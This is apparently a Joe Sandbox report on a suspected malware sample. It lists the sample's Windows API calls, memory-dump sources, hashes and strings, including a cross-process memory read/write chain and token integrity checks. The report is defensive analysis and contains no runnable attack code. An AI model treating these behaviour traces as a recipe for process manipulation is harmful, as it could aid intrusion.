                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 6dd8e70fc588cf1780ff1f42e7dc5d4449893c0876f7372815e4a26a05b0f859
                                                • Instruction ID: d4369af5307c0e3221668bf90c78817668ff723d4513fce3308674b169010b9e
                                                • Opcode Fuzzy Hash: 6dd8e70fc588cf1780ff1f42e7dc5d4449893c0876f7372815e4a26a05b0f859
                                                • Instruction Fuzzy Hash: 75012D31D05A1EDBCF20EFE5D8496EDBB78FB09B15F400155EA81F2144CB355550ABA1
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FD8121
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FD812B
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD813A
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8141
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8157
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: f05af9ff87271f13b1bdf89589c075423c6d09ec546c9d7f01ba6e697ec032e3
                                                • Instruction ID: e6c657db5c773541b07f756179cd3a45705da9f6928768eb7b39bf07473bc5be
                                                • Opcode Fuzzy Hash: f05af9ff87271f13b1bdf89589c075423c6d09ec546c9d7f01ba6e697ec032e3
                                                • Instruction Fuzzy Hash: 2AF06871600315AFD7325F65DC89F673BADFF497A4F040016F585C6240CB659D46EB60
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00FDC1F7
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FDC20E
                                                • MessageBeep.USER32(00000000), ref: 00FDC226
                                                • KillTimer.USER32(?,0000040A), ref: 00FDC242
                                                • EndDialog.USER32(?,00000001), ref: 00FDC25C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 9350e3c03820ece44c8817364da470fbe7cf44b5c0416b94252c0365181306ab
                                                • Instruction ID: e919e2099de00e2b5c5fa507474fefdccffd84fd96ca57113b36ae41f8d11d46
                                                • Opcode Fuzzy Hash: 9350e3c03820ece44c8817364da470fbe7cf44b5c0416b94252c0365181306ab
                                                • Instruction Fuzzy Hash: 6001DB3044430597EB325B60DD4EF967779FF04706F04025AF5C2915D0DBF56944EB90
                                                APIs
                                                • EndPath.GDI32(?), ref: 00F813BF
                                                • StrokeAndFillPath.GDI32(?,?,00FBB888,00000000,?), ref: 00F813DB
                                                • SelectObject.GDI32(?,00000000), ref: 00F813EE
                                                • DeleteObject.GDI32 ref: 00F81401
                                                • StrokePath.GDI32(?), ref: 00F8141C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: 5e868886e4b0af7a03dc367696c74af038c4a1aaecb18e154caaf75c267881bd
                                                • Instruction ID: 8de39764fde118242c4c993da130d0d4a11cba899ef67f834e85390af35f8a18
                                                • Opcode Fuzzy Hash: 5e868886e4b0af7a03dc367696c74af038c4a1aaecb18e154caaf75c267881bd
                                                • Instruction Fuzzy Hash: D1F0CD740042099BEB329F56ED8C7983BA8B701326F188318F4A9594F8CB3A4596EF50
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00FEC432
                                                • CoCreateInstance.OLE32(01012D6C,00000000,00000001,01012BDC,?), ref: 00FEC44A
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                • CoUninitialize.OLE32 ref: 00FEC6B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                • String ID: .lnk
                                                • API String ID: 2683427295-24824748
                                                • Opcode ID: 8ffcb29c1b9b86f6e7eb9142d08d1ef7a30d96d56a764c57f29d183b360e3203
                                                • Instruction ID: acd817c65790b52e1d5a68a4eed92c18bd5c72f559a05ff9994f996fefd6d491
                                                • Opcode Fuzzy Hash: 8ffcb29c1b9b86f6e7eb9142d08d1ef7a30d96d56a764c57f29d183b360e3203
                                                • Instruction Fuzzy Hash: 3FA15B71208205AFD700EF54CC81EABB7E8FF88358F44491CF5969B192DBB5EA09CB52
                                                APIs
                                                  • Part of subcall function 00FA0DB6: std::exception::exception.LIBCMT ref: 00FA0DEC
                                                  • Part of subcall function 00FA0DB6: __CxxThrowException@8.LIBCMT ref: 00FA0E01
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 00F87A51: _memmove.LIBCMT ref: 00F87AAB
                                                • __swprintf.LIBCMT ref: 00F92ECD
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F92D66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 1943609520-557222456
                                                • Opcode ID: 32cefd1f75f45a19db72833a4ea0c660add4c5f63327c2c3dcd09e384d2b28dd
                                                • Instruction ID: 32ba5d9d0fadf06a5b6de4a4bb9b7837a7acb9bbb742cee7d9dfbb6e54966537
                                                • Opcode Fuzzy Hash: 32cefd1f75f45a19db72833a4ea0c660add4c5f63327c2c3dcd09e384d2b28dd
                                                • Instruction Fuzzy Hash: A9918C71508302AFDB14FF24CC86DAEB7A8EF85710F14081DF4959B2A1EA38ED44EB52
                                                APIs
                                                  • Part of subcall function 00F84750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F84743,?,?,00F837AE,?), ref: 00F84770
                                                • CoInitialize.OLE32(00000000), ref: 00FEB9BB
                                                • CoCreateInstance.OLE32(01012D6C,00000000,00000001,01012BDC,?), ref: 00FEB9D4
                                                • CoUninitialize.OLE32 ref: 00FEB9F1
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                • String ID: .lnk
                                                • API String ID: 2126378814-24824748
                                                • Opcode ID: c39f0c68b80488c99220f015264bb291c5cd4717c63d218fa799688288cf049c
                                                • Instruction ID: 133ad293dcda215cab59758964415e3666c1bc6faa33ec95055d0a434cde2836
                                                • Opcode Fuzzy Hash: c39f0c68b80488c99220f015264bb291c5cd4717c63d218fa799688288cf049c
                                                • Instruction Fuzzy Hash: 85A186756043019FCB00EF15C880D6ABBE5FF89324F148998F8999B362CB35EC45DB91
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 00FA50AD
                                                  • Part of subcall function 00FB00F0: __87except.LIBCMT ref: 00FB012B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 48e36069133214519a2154638d56500d5adb918dde26511ed563028e7000ebe4
                                                • Instruction ID: 9e8c9e550e6e909c1856b9d96182600a8681e24cad26de4bf9962507dc75bd50
                                                • Opcode Fuzzy Hash: 48e36069133214519a2154638d56500d5adb918dde26511ed563028e7000ebe4
                                                • Instruction Fuzzy Hash: 265160B1D0860286DB257619CD453BF3B94AF42B20F20CD59E4D586299EE3D8DC8BF86
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                • Opcode ID: cd6f1d1539df6adee0fd02bb0e86a6173a509fc15adf65c3b333084d3a98697e
                                                • Instruction ID: 0cd554e30040ce8e1ae4603b2ad1374252da4763943109b63455a43969968973
                                                • Opcode Fuzzy Hash: cd6f1d1539df6adee0fd02bb0e86a6173a509fc15adf65c3b333084d3a98697e
                                                • Instruction Fuzzy Hash: 5D51AF71E00305DBEF24DF65C985BAAB7E5EF44314F24856EE84ACB241EB74AA44EB40
                                                APIs
                                                  • Part of subcall function 00FE14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FD9296,?,?,00000034,00000800,?,00000034), ref: 00FE14E6
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FD983F
                                                  • Part of subcall function 00FE1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FD92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00FE14B1
                                                  • Part of subcall function 00FE13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00FE1409
                                                  • Part of subcall function 00FE13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FD925A,00000034,?,?,00001004,00000000,00000000), ref: 00FE1419
                                                  • Part of subcall function 00FE13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FD925A,00000034,?,?,00001004,00000000,00000000), ref: 00FE142F
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FD98AC
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FD98F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: f4a5fb0fad94e9be1357af839f15bfb8b58d45ee672eb9000c23a12a585f4a27
                                                • Instruction ID: cbb08e9869d15317706837b7315c1645cae59471aaefb628e88ad942e8ed2517
                                                • Opcode Fuzzy Hash: f4a5fb0fad94e9be1357af839f15bfb8b58d45ee672eb9000c23a12a585f4a27
                                                • Instruction Fuzzy Hash: 23415E76D0021CAFDB20DFA5CC81EDEBBB8EB09700F044199F945B7281DA756E45DBA1
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0100F910,00000000,?,?,?,?), ref: 010079DF
                                                • GetWindowLongW.USER32 ref: 010079FC
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01007A0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: a0ef918add9553cdd170fdb46ebcdefdcb0e957d4ba610358f12db1e4647200f
                                                • Instruction ID: f9a278040a55ab10d04ab89841ce7d0a37e1bde89b96658db80185c67790ea01
                                                • Opcode Fuzzy Hash: a0ef918add9553cdd170fdb46ebcdefdcb0e957d4ba610358f12db1e4647200f
                                                • Instruction Fuzzy Hash: 32310131200206ABEB628E38CC41BEB7BA9FB45324F204725F9F5A31D0D739F8909B50
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01007461
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01007475
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 01007499
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: a24fdfcb67467e88cbf8b8e25e5ae0b0b7865bc3d894cba948be5cd837434269
                                                • Instruction ID: d960fb38738e1efcef619c6a443faec76ba8c720b6af7031cbf6c9f1589c590a
                                                • Opcode Fuzzy Hash: a24fdfcb67467e88cbf8b8e25e5ae0b0b7865bc3d894cba948be5cd837434269
                                                • Instruction Fuzzy Hash: 0221D632500219ABEF22CE54CC41FEA3BA9FF48714F110254FE956B1D0DB79B851DBA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01007C4A
                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01007C58
                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01007C5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 4014797782-2298589950
                                                • Opcode ID: 10f2bd32173f53ab01fec40c02f488aed83bac720623facb7c4fbee3f3c30278
                                                • Instruction ID: 38b8024479889fdca278b630de653d0a946289e3cf6d75b156671b1fa5a6110d
                                                • Opcode Fuzzy Hash: 10f2bd32173f53ab01fec40c02f488aed83bac720623facb7c4fbee3f3c30278
                                                • Instruction Fuzzy Hash: D2214FB5600109AFEB12DF28DCC1DA637ECEB49354F140059FA819B291CA76FC519B60
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01006D3B
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01006D4B
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01006D70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: 923b915702c6bc660037585dfea20a358a90b701d82a39464c5734df9fdbcc6e
                                                • Instruction ID: dc368cfb6a760887158f0f1add0268ebbd3a2848750e58156cb0f3187feae00b
                                                • Opcode Fuzzy Hash: 923b915702c6bc660037585dfea20a358a90b701d82a39464c5734df9fdbcc6e
                                                • Instruction Fuzzy Hash: 4A21B332600118BFEF239F58DC44FBB3BAAEB89750F018165F9859B191CA729C6197A0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01007772
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01007787
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01007794
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: 0fd7882f3ba9326da815aa5f255faed7aa584852eb04a48a9ba729403d7ae97b
                                                • Instruction ID: 97dbfbd518c9f11ee764938618a02868663bd7925b3420b2a32661944f12a1e8
                                                • Opcode Fuzzy Hash: 0fd7882f3ba9326da815aa5f255faed7aa584852eb04a48a9ba729403d7ae97b
                                                • Instruction Fuzzy Hash: 0F11C472240209BBEB255E65CC45FEB77A9FF88B94F014228FB85960D0D676A411DB10
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84B83,?), ref: 00F84C44
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F84C56
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
